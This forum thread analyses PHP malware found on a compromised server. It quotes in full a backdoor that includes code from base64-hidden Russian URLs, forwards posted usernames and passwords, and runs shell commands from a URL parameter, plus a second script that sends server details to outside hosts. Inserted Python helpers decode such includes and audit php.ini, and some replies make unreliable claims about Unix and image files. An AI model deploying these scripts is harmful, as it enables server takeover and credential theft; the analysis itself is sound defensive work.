
joecooper

just need to know what this code does...


Can someone explain in detail what exactly this code does? Thanks. I'm good with PHP but this looks complex to me!

[code]<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>[/code]

name
password
url


[code]<?php
error_reporting(0);// error reporting off

if(isset($_POST["l"]) and isset($_POST["p"])){ // post name and password

if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
// post name and password encode them.

else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}//post name and password encoded

if(!isset($_POST["log_flg"])){$log_flg="&log";}
// if name and password exist encoded

if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
// decode the name password and the url via ip
{
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
//get name and password if active and post information
?>[/code]

Did you get hacked, Joe?

'Cause this looks like part of the authentication for a hacking script... it sends info to a Russian site to verify the username and password, and if it returns a certain value, executes some system commands.

I didn't get hacked, but someone I know has, and that was the script that was uploaded.

I see now. I decoded the base64 code and it returned

http://bis.iframe.ru/master.php?r_addr=

I had a friend get hacked as well over the past week. He ended up with a hacker script that opens up a huge backdoor... luckily the hacker wasn't smart and named it something very obvious, so he was able to quickly pick it out from all his other scripts.

How about this code that was also uploaded?

[code]<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>[/code]

ip.
88.151.116.6

company url
http://ns0.ru/

the above code seems to be able to get and add database information to another database ok.

Same type thing, but this time it sends all of your server information:
[code]
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
[/code]
to a server somewhere...if the first one fails, it goes to a second.

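Added example, not part of the original thread or any poster's code: a small static triage helper that folds the `base64_decode("...")` literals in an `include` argument and reports where the file would be fetched from, which is the decoding done by hand earlier in the thread and the primary/fallback pattern described in the post above. The function names are illustrative and the input is the include expressions from the two quoted samples, trimmed.

```python
import base64
import re

# Constructed input: include expressions copied from the two samples quoted
# in this thread, cut down to the parts that build the URL.
FIRST = ('if(! @include_once(base64_decode('
         '"aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . '
         'sprintf("%u", ip2long(getenv(REMOTE_ADDR)))))')
SECOND = ('if ((include(base64_decode("aHR0cDovLw==").'
          'base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else '
          '{include(base64_decode("aHR0cDovLw==").'
          'base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);}')

B64_CALL = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
CONCAT = re.compile(r'"([^"]*)"\s*\.\s*"([^"]*)"')
INCLUDE = re.compile(r'\b(?:include|require)(?:_once)?\s*\(')
REMOTE = re.compile(r'\s*"((?:https?|ftp)://[^"]*)"')


def fold_literals(expr):
    """Decode base64_decode("...") calls on string literals, then merge
    literals joined by PHP's '.' operator until nothing changes.
    Heuristic: works on text, it does not parse PHP."""
    folded = B64_CALL.sub(
        lambda m: '"%s"' % base64.b64decode(m.group(1)).decode("latin-1"),
        expr)
    while True:
        merged = CONCAT.sub(lambda m: '"%s%s"' % (m.group(1), m.group(2)),
                            folded)
        if merged == folded:
            return folded
        folded = merged


def remote_include_targets(php_source):
    """Return the URL prefix of every include/require whose argument
    starts with a remote URL once the literals are folded."""
    targets = []
    for call in INCLUDE.finditer(php_source):
        hit = REMOTE.match(fold_literals(php_source[call.end():]))
        if hit:
            targets.append(hit.group(1))
    return targets


if __name__ == "__main__":
    for name, src in (("first", FIRST), ("second", SECOND)):
        print(name, remote_include_targets(src))
```
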
How can a PHP script open a back door though? It can't exactly edit files unless they are chmod 777... and not many people have many folders set as chmod.

Once the script is on your server it can do a chmod on them just like you can. I set up a VM and ran the script that was left on my friend's server... I was able to see the entire directory structure... the hd, the cd drive, the floppy drive... I could execute command line scripts and such... I could manipulate any of the files on the server I wanted.

In his particular case there is a security hole in one of the earlier versions of the smf bridge for joomla that the hacker exploited.

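Added example, not part of the original thread: the first sample quoted above only works if PHP will `include` an `http://` URL and will run `system()` and backticks, and both are controlled by php.ini. This sketch audits an ini text for those settings; it assumes PHP 5.2 or later defaults (`allow_url_fopen` on, `allow_url_include` off), the two ini fragments are constructed, and the function names are illustrative.

```python
# Constructed php.ini fragments (not taken from any server in the thread).
WEAK_INI = """
[PHP]
allow_url_fopen = On
allow_url_include = On   ; remote include permitted
disable_functions =
"""
HARDENED_INI = """
[PHP]
allow_url_fopen = Off
allow_url_include = Off
disable_functions = system,exec,passthru,shell_exec,popen,proc_open
"""

TRUTHY = {"1", "on", "yes", "true"}
# Functions the first sample calls; the backtick operator is disabled
# together with shell_exec.
NEEDED_BY_SAMPLE = ("system", "shell_exec")


def parse_ini(text):
    """Minimal php.ini reader: key = value lines, ';' starts a comment.
    It does not handle ';' inside quoted values."""
    settings = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()
        if "=" in line and not line.startswith("["):
            key, value = line.split("=", 1)
            settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def audit(text):
    """Return findings that would let the quoted samples work as written."""
    ini = parse_ini(text)
    findings = []
    # include("http://...") needs allow_url_fopen AND allow_url_include.
    url_fopen = ini.get("allow_url_fopen", "1").lower() in TRUTHY
    url_include = ini.get("allow_url_include", "0").lower() in TRUTHY
    if url_fopen and url_include:
        findings.append("remote include enabled")
    disabled = {name.strip().lower()
                for name in ini.get("disable_functions", "").split(",")}
    for func in NEEDED_BY_SAMPLE:
        if func not in disabled:
            findings.append(func + " callable")
    return findings


if __name__ == "__main__":
    print("weak:", audit(WEAK_INI))
    print("hardened:", audit(HARDENED_INI))
```
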
Most hackers can upload code that is also in a photo, then the code posts information back to the hacker.

The hacker is only interested in the open ports to machines hanging off the server, for example a credit card server.

There are thousands of tools and thousands of holes in computer programs. I know for a fact that large well known companies out there have got vulnerable hotspots on operating systems to get into all machines linked to the net.

In real reality there is no such thing as security as we'd like to know it; there will always be back doors to all programs, as computer developers use hackers themselves for development, fact.

How do you mean they can upload code in a photo? Do you mean they have a .php file labeled as a .jpg.... because the server wouldn't parse this as a PHP file, it would only output the code to the user.

.gif files can contain executable code.

EDIT:  Not php, but other languages...not sure which...never looked into it.

The most powerful hackers that are around are the ones involved in Unix, that's why Linux is a cut down version.

Unix programming with machine code is like owning a bank lol...

[quote]The most powerful hackers that are around are the ones involved in Unix, that's why Linux is a cut down version.[/quote]
What are you babbling about?
